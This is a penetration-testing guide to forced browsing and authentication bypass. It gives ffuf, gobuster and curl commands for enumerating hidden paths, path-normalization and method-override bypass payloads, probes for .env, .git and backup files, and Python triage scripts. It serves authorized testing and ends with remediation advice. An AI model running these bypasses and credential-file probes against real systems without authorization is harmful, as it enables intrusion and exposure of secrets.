
Bypassing Authentication with Forced Browsing


When to Use


  • During authorized penetration tests to discover hidden or unprotected administrative pages
  • When testing whether authentication is consistently enforced across all application endpoints
  • For identifying backup files, configuration files, and debug interfaces left exposed in production
  • When assessing access control on API endpoints that should require authentication
  • During security audits to validate that all sensitive resources enforce session validation

Prerequisites


  • Authorization: Written penetration testing agreement covering directory enumeration
  • ffuf: Fast web fuzzer (`go install github.com/ffuf/ffuf/v2@latest`)
  • Gobuster: Directory brute-force tool (`apt install gobuster`)
  • Burp Suite: For intercepting and analyzing requests and responses
  • Wordlists: SecLists collection (`git clone https://github.com/danielmiessler/SecLists.git`; the commands below assume the package layout under `/usr/share/seclists`)
  • Target access: Network connectivity and valid test credentials for authenticated comparison

Workflow


Step 1: Enumerate Hidden Directories and Files


Use ffuf or Gobuster to discover paths not linked in the application's navigation.

```bash
# Directory enumeration with ffuf
# -mc already restricts output to the listed codes, so -fc 404 is redundant
# but harmless. Add -ac (auto-calibration) when the target answers every
# unknown path with a 200 "soft 404" page.
ffuf -u https://target.example.com/FUZZ \
  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
  -mc 200,301,302,403 \
  -fc 404 \
  -o results-dirs.json -of json \
  -t 50 -rate 100

# File enumeration with common extensions
ffuf -u https://target.example.com/FUZZ \
  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
  -e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.cfg,.conf,.env \
  -mc 200,301,302,403 \
  -fc 404 \
  -o results-files.json -of json \
  -t 50 -rate 100

# Gobuster for directory enumeration
# Gobuster 3.1+ refuses to start when -s is combined with its default
# status-code blacklist (404), so clear the blacklist with -b "".
gobuster dir -u https://target.example.com \
  -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
  -s "200,204,301,302,307,403" -b "" \
  -x php,asp,aspx,jsp,html \
  -o gobuster-results.txt \
  -t 50
```
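The JSON that ffuf writes with `-of json` is easier to triage in code than by eye, and the first thing to strip out is soft-404 noise: a catch-all page returned with 200 for any unknown path shows up as a cluster of hits with identical length. The following script is an added example, not part of the original page or of ffuf; it assumes the `results` array layout ffuf emits (`input.FUZZ`, `status`, `length`, `url`, `redirectlocation`) and uses a constructed sample document rather than a real scan.

```python
import json
from collections import Counter

# Constructed sample in the shape ffuf writes with "-of json". Not a real
# scan result: three 200s of identical length stand in for a soft-404 page.
SAMPLE_FFUF_JSON = json.dumps({
    "results": [
        {"input": {"FUZZ": "admin"},   "status": 200, "length": 18231,
         "url": "https://target.example.com/admin",   "redirectlocation": ""},
        {"input": {"FUZZ": "backup"},  "status": 200, "length": 1245,
         "url": "https://target.example.com/backup",  "redirectlocation": ""},
        {"input": {"FUZZ": "foo"},     "status": 200, "length": 1245,
         "url": "https://target.example.com/foo",     "redirectlocation": ""},
        {"input": {"FUZZ": "bar"},     "status": 200, "length": 1245,
         "url": "https://target.example.com/bar",     "redirectlocation": ""},
        {"input": {"FUZZ": "console"}, "status": 403, "length": 153,
         "url": "https://target.example.com/console", "redirectlocation": ""},
        {"input": {"FUZZ": "login"},   "status": 302, "length": 0,
         "url": "https://target.example.com/login",
         "redirectlocation": "https://target.example.com/auth/login"},
    ]
})

# Codes worth a manual look. 403 usually means the path exists behind a
# proxy rule, which makes it a candidate for the normalization tests later.
INTERESTING = {200, 201, 204, 301, 302, 401, 403}


def triage(ffuf_json: str, min_cluster: int = 3):
    """Split ffuf results into findings and probable soft-404 noise.

    Heuristic: when `min_cluster` or more 200 responses share exactly the
    same body length, that length is treated as the soft-404 signature.
    Returns (findings, noise), each a list of small dicts.
    """
    results = json.loads(ffuf_json)["results"]
    length_counts = Counter(r["length"] for r in results if r["status"] == 200)
    soft404_lengths = {ln for ln, n in length_counts.items() if n >= min_cluster}

    findings, noise = [], []
    for r in results:
        entry = {
            "path": "/" + r["input"]["FUZZ"],
            "status": r["status"],
            "length": r["length"],
            "redirect": r.get("redirectlocation", ""),
        }
        if r["status"] == 200 and r["length"] in soft404_lengths:
            noise.append(entry)
        elif r["status"] in INTERESTING:
            findings.append(entry)
    return findings, noise


if __name__ == "__main__":
    # Real use: triage(open("results-dirs.json").read())
    hits, junk = triage(SAMPLE_FFUF_JSON)
    for h in hits:
        print(f"{h['status']} {h['path']} len={h['length']} {h['redirect']}")
    print(f"{len(junk)} probable soft-404 responses suppressed")
```

Length clustering is deliberately conservative: it only suppresses a length once it repeats, so a single real page that happens to match the catch-all size still surfaces, and the 302 to `/auth/login` is kept because the redirect target is itself evidence of where the login boundary sits.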

Step 2: Discover Administrative and Debug Interfaces


Target common administrative paths and debug endpoints.

```bash
# Admin panel enumeration
ffuf -u https://target.example.com/FUZZ \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -mc 200,301,302 \
  -t 50 -rate 100

# Common admin paths to check manually:
#   /admin, /administrator, /admin-panel, /wp-admin
#   /cpanel, /phpmyadmin, /adminer, /manager
#   /console, /debug, /actuator, /swagger-ui
#   /graphql, /graphiql, /.env, /server-status

# API endpoint discovery
ffuf -u https://target.example.com/api/FUZZ \
  -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
  -mc 200,201,204,301,302,401,403 \
  -fc 404 \
  -o api-results.json -of json

# Check for Spring Boot Actuator endpoints
# "trace" is the Spring Boot 1.x name; 2.x renamed it "httptrace".
# If /actuator/heapdump answers 200, fetch it to disk separately: it is a
# full JVM heap snapshot and routinely contains live credentials.
for endpoint in env health info beans configprops mappings trace httptrace; do
  curl -s -o /dev/null -w "%{http_code} /actuator/$endpoint\n" \
    "https://target.example.com/actuator/$endpoint"
done
```

Step 3: Test Authentication Enforcement on Discovered Endpoints


Compare responses between unauthenticated and authenticated requests. A status code alone is not proof either way: many applications serve the login form with 200, so a 200 on an admin path only counts as a bypass when the body matches what an authenticated session sees, and a 302 to the login page is enforcement, not a finding.

```bash
# Test without authentication
curl -s -o /dev/null -w "%{http_code}\n" \
  "https://target.example.com/admin/dashboard"

# Test with valid session cookie
curl -s -o /dev/null -w "%{http_code}\n" \
  -b "session=valid_session_token_here" \
  "https://target.example.com/admin/dashboard"

# Automated check: compare response sizes
# Unauthenticated request
curl -s "https://target.example.com/admin/users" | wc -c
# Authenticated request
curl -s -b "session=valid_token" \
  "https://target.example.com/admin/users" | wc -c
# If both return similar content, authentication is not enforced

# Test with Burp Intruder: send a list of discovered URLs
# without cookies and flag any 200 responses
```
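Doing the comparison by hand for every discovered path does not scale, and "flag any 200" produces false positives on login forms. The script below is an added example, not code from the original page: it classifies one path as BYPASS, ENFORCED or REVIEW from the pair of responses (unauthenticated, authenticated), using a login-page redirect, a password field in the body, and body similarity as the signals described above. The `fetch` helper, the `Resp` type, the regexes and the sample responses are all constructed here; no real target's responses are used.

```python
import difflib
import http.client
import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass
class Resp:
    status: int
    location: str  # Location header on a redirect, "" otherwise
    body: str


# Redirect targets that mean "go log in first" (assumed patterns)
LOGIN_URL = re.compile(r"/(login|signin|sign-in|auth|sso)\b", re.IGNORECASE)
# A body that is really a login form, even when served with 200
LOGIN_FORM = re.compile(r"<input[^>]+type=[\"']?password", re.IGNORECASE)


def fetch(url: str, cookie: str = "", timeout: int = 10) -> Resp:
    """GET `url` without following redirects: a 302 is evidence we want to
    keep, not skip over. Network helper; the offline samples do not use it."""
    u = urlparse(url)
    conn_cls = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(u.netloc, timeout=timeout)
    headers = {"Cookie": cookie} if cookie else {}
    conn.request("GET", u.path or "/", headers=headers)
    r = conn.getresponse()
    body = r.read().decode("utf-8", "replace")
    conn.close()
    return Resp(r.status, r.getheader("Location", "") or "", body)


def classify(unauth: Resp, auth: Resp) -> str:
    """Return BYPASS, ENFORCED or REVIEW for one path from its two responses."""
    if unauth.status in (401, 403):
        return "ENFORCED"
    if unauth.status in (301, 302, 303, 307, 308) and LOGIN_URL.search(unauth.location):
        return "ENFORCED"
    # A 200 whose body is a login form is enforcement, not a bypass,
    # provided the authenticated view is not the same form.
    if unauth.status == 200 and LOGIN_FORM.search(unauth.body) and not LOGIN_FORM.search(auth.body):
        return "ENFORCED"
    if auth.status != 200 or unauth.status != 200:
        return "REVIEW"  # test account may lack the role, or the endpoint errored
    # Both 200: near-identical bodies mean the session made no difference.
    ratio = difflib.SequenceMatcher(None, unauth.body, auth.body).ratio()
    return "BYPASS" if ratio >= 0.9 else "REVIEW"


def check(base_url: str, path: str, cookie: str) -> str:
    """Live check of one path (needs network access and a valid test session)."""
    return classify(fetch(base_url + path), fetch(base_url + path, cookie))


# Constructed sample responses, not captured from any real target.
ADMIN_PAGE = "<html><h1>Admin</h1><table>" + "<tr><td>user</td></tr>" * 20 + "</table></html>"
LOGIN_PAGE = ('<html><form action="/login"><input name="user">'
              '<input type="password" name="password"></form></html>')
SAMPLES = {
    "/admin/dashboard": (Resp(200, "", ADMIN_PAGE), Resp(200, "", ADMIN_PAGE)),
    "/admin/users":     (Resp(302, "/login?next=/admin/users", ""), Resp(200, "", ADMIN_PAGE)),
    "/admin/settings":  (Resp(200, "", LOGIN_PAGE), Resp(200, "", ADMIN_PAGE)),
    "/admin/export":    (Resp(500, "", "error"), Resp(200, "", ADMIN_PAGE)),
}


def run_samples() -> dict:
    return {path: classify(u, a) for path, (u, a) in SAMPLES.items()}


if __name__ == "__main__":
    for path, verdict in run_samples().items():
        print(f"{verdict:9} {path}")
```

REVIEW is the honest verdict when the authenticated request itself fails: a test account without the admin role cannot prove the control is missing, only that it is present for that role. The similarity threshold of 0.9 is a starting point; dynamic content such as CSRF tokens and timestamps lowers the ratio, so drop it or strip those fields when pages are template-heavy.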

Step 4: Test HTTP Method-Based Authentication Bypass


Some applications only enforce authentication for specific HTTP methods.

```bash
# Test different HTTP methods on protected endpoints
# curl -X HEAD waits for a body that never arrives, so HEAD is sent with -I.
for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE; do
  echo -n "$method: "
  if [ "$method" = "HEAD" ]; then
    curl -s -o /dev/null -w "%{http_code}\n" -I \
      "https://target.example.com/admin/settings"
  else
    curl -s -o /dev/null -w "%{http_code}\n" \
      -X "$method" "https://target.example.com/admin/settings"
  fi
done

# Test HTTP method override headers
curl -s -o /dev/null -w "%{http_code}\n" \
  -X POST \
  -H "X-HTTP-Method-Override: GET" \
  "https://target.example.com/admin/settings"

curl -s -o /dev/null -w "%{http_code}\n" \
  -H "X-Original-Method: GET" \
  -H "X-Rewrite-URL: /admin/settings" \
  "https://target.example.com/"
```

Step 5: Test Path Traversal and URL Normalization Bypass


Exploit URL parsing differences to bypass path-based authentication rules. These variants work when a front-end component (reverse proxy, WAF, servlet filter) matches the rule against the raw request path while the backend normalizes the path differently before routing it.

```bash
# Path normalization bypass attempts
# Compare each against the baseline /admin/dashboard response; a 200 where
# the baseline gives 302/401/403 is a bypass candidate.
# curl squashes /./ and /../ itself before sending unless --path-as-is is set.
curl -s -o /dev/null -w "%{http_code}\n" "https://target.example.com/admin/dashboard"
curl -s -o /dev/null -w "%{http_code}\n" "https://target.example.com/ADMIN/dashboard"
curl -s -o /dev/null -w "%{http_code}\n" --path-as-is "https://target.example.com/admin/./dashboard"
curl -s -o /dev/null -w "%{http_code}\n" --path-as-is "https://target.example.com/public/../admin/dashboard"
curl -s -o /dev/null -w "%{http_code}\n" "https://target.example.com/admin%2fdashboard"
curl -s -o /dev/null -w "%{http_code}\n" "https://target.example.com/;/admin/dashboard"
curl -s -o /dev/null -w "%{http_code}\n" "https://target.example.com/admin;anything/dashboard"
curl -s -o /dev/null -w "%{http_code}\n" --path-as-is "https://target.example.com/.;/admin/dashboard"

# Double URL encoding
curl -s -o /dev/null -w "%{http_code}\n" "https://target.example.com/%2561dmin/dashboard"

# Trailing characters
curl -s -o /dev/null -w "%{http_code}\n" "https://target.example.com/admin/dashboard/"
curl -s -o /dev/null -w "%{http_code}\n" "https://target.example.com/admin/dashboard.json"
curl -s -o /dev/null -w "%{http_code}\n" "https://target.example.com/admin/dashboard%00"
```
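To see why these variants work, it helps to model the two sides of the mismatch in code. The block below is an added example, not from the original page or any real product: `needs_auth_naive` is a constructed stand-in for a proxy rule that matches the raw path by string prefix, and `needs_auth_hardened` canonicalizes the path (repeated percent-decoding, path-parameter stripping, NUL truncation, dot-segment and slash collapsing, case folding) before matching. The list of variants is the one from the curl commands above plus a double-slash case.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed model of a front-end rule that protects /admin by matching a
# string prefix on the raw request path. Not taken from any real product.
def needs_auth_naive(raw_path: str) -> bool:
    return raw_path.startswith("/admin/")


def canonicalize(raw_path: str) -> str:
    """Reduce a request path to the form a typical backend would route on."""
    path = raw_path
    # Percent-decode repeatedly so %2561 -> %61 -> a (bounded to avoid loops)
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Drop path parameters (";jsessionid=...", "/admin;x/") segment by segment
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    # Truncate at an embedded NUL, as C-string based components would
    path = path.split("\x00", 1)[0]
    # Collapse repeated slashes before normpath: it keeps a leading "//" as-is
    path = re.sub(r"/+", "/", path)
    # Resolve "." and ".." segments and strip a trailing slash
    path = posixpath.normpath(path)
    if not path.startswith("/"):
        path = "/" + path
    return path.lower()


def needs_auth_hardened(raw_path: str) -> bool:
    canon = canonicalize(raw_path)
    return canon == "/admin" or canon.startswith("/admin/")


VARIANTS = [
    "/admin/dashboard",
    "/ADMIN/dashboard",
    "/admin/./dashboard",
    "/public/../admin/dashboard",
    "/admin%2fdashboard",
    "/;/admin/dashboard",
    "/admin;anything/dashboard",
    "/.;/admin/dashboard",
    "/%2561dmin/dashboard",
    "/admin/dashboard/",
    "/admin/dashboard%00",
    "//admin/dashboard",
]


def leaked_by_naive_rule():
    """Variants that reach /admin after canonicalization but slip past the
    prefix rule: every one of these is an unauthenticated admin request."""
    return [v for v in VARIANTS if needs_auth_hardened(v) and not needs_auth_naive(v)]


if __name__ == "__main__":
    for v in VARIANTS:
        print(f"{v:32} naive={needs_auth_naive(v)!s:5} "
              f"hardened={needs_auth_hardened(v)!s:5} canon={canonicalize(v)}")
```

The hardened rule is still only a model of one backend's behaviour; a real front-end cannot know in general how every backend decodes and routes. That is why the Recommendation section below puts the authentication check in the application or middleware that actually serves the route, where the canonical path is already known, rather than in a path filter in front of it.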

Step 6: Discover Backup and Configuration Files


Search for sensitive files inadvertently exposed on the web server.

```bash
# Backup file discovery
ffuf -u https://target.example.com/FUZZ \
  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
  -e .bak,.old,.orig,.save,.swp,.tmp,.dist,.config,.sql,.gz,.tar,.zip \
  -mc 200 -t 50 -rate 100

# Common sensitive files
for file in .env .git/config .git/HEAD .svn/entries \
  web.config wp-config.php.bak config.php.old \
  database.yml .htpasswd server-status phpinfo.php \
  robots.txt sitemap.xml crossdomain.xml; do
  status=$(curl -s -o /dev/null -w "%{http_code}" \
    "https://target.example.com/$file")
  if [ "$status" != "404" ]; then
    echo "FOUND ($status): $file"
  fi
done

# Git repository exposure check
# If this returns "ref: refs/heads/main", the git repo is exposed
curl -s "https://target.example.com/.git/HEAD"
```

Key Concepts


| Concept | Description |
|---|---|
| Forced Browsing | Directly accessing URLs that are not linked but exist on the server |
| Directory Enumeration | Brute-forcing directory and file names against a wordlist to discover hidden content |
| Authentication Bypass | Accessing protected resources without valid credentials due to missing access checks |
| Path Normalization | Exploiting differences in how web servers and application frameworks parse URL paths |
| Method-based Bypass | Using alternative HTTP methods (PUT, DELETE) that may not have authentication checks |
| Information Disclosure | Exposure of sensitive configuration files, backups, or debug interfaces |
| Defense in Depth | Layered security controls where authentication is enforced at multiple levels |

Tools & Systems


| Tool | Purpose |
|---|---|
| ffuf | Fast web fuzzer for directory, file, and parameter enumeration |
| Gobuster | Directory and DNS brute-forcing tool written in Go |
| Feroxbuster | Content discovery tool written in Rust that recurses into discovered directories automatically |
| DirBuster | OWASP Java-based directory brute-force tool with GUI |
| Burp Suite | HTTP proxy for request interception and automated scanning |
| SecLists | Comprehensive collection of wordlists for security testing |

Common Scenarios


Scenario 1: Exposed Admin Panel


An admin panel at `/admin/` is only hidden by not being linked in the navigation. Direct URL access reveals the full administrative interface without any authentication check.

Scenario 2: Unprotected API Endpoints


API endpoints at `/api/v1/users` and `/api/v1/settings` require authentication in the frontend application, but the backend API does not enforce session validation, allowing unauthenticated direct access.

Scenario 3: Backup File Containing Credentials


A developer left `config.php.bak` on the production server. This backup file contains database credentials in plaintext and was discovered through extension-based enumeration.

Scenario 4: Spring Boot Actuator Exposure


The `/actuator/env` endpoint is exposed without authentication, revealing environment variables including database connection strings, API keys, and secrets. Note that recent Spring Boot versions mask the values of keys that look like secrets in this endpoint by default, so a masked `/actuator/env` is still a finding; an exposed `/actuator/heapdump` on the same host contains the unmasked values in memory.

Output Format


Forced Browsing / Authentication Bypass Finding

Vulnerability: Missing Authentication on Administrative Interface
Severity: Critical (CVSS 9.1)
Location: /admin/dashboard (GET, no authentication required)
OWASP Category: A01:2021 - Broken Access Control

Discovered Unprotected Resources


| Path | Status | Auth Required | Content |
|---|---|---|---|
| /admin/dashboard | 200 | No | Full admin panel |
| /admin/users | 200 | No | User management |
| /actuator/env | 200 | No | Environment variables |
| /config.php.bak | 200 | No | Database credentials |
| /.git/HEAD | 200 | No | Git repository metadata |

Impact


  • Unauthenticated access to administrative functions
  • Ability to create, modify, and delete user accounts
  • Exposure of database credentials and API keys
  • Full source code disclosure via exposed Git repository

Recommendation


  1. Implement authentication checks at the server/middleware level for all admin routes
  2. Remove backup files, debug endpoints, and version control metadata from production
  3. Configure web server to deny access to sensitive file extensions (.bak, .old, .env, .git)
  4. Implement IP-based access restrictions for administrative interfaces
  5. Use a reverse proxy to restrict access to internal-only endpoints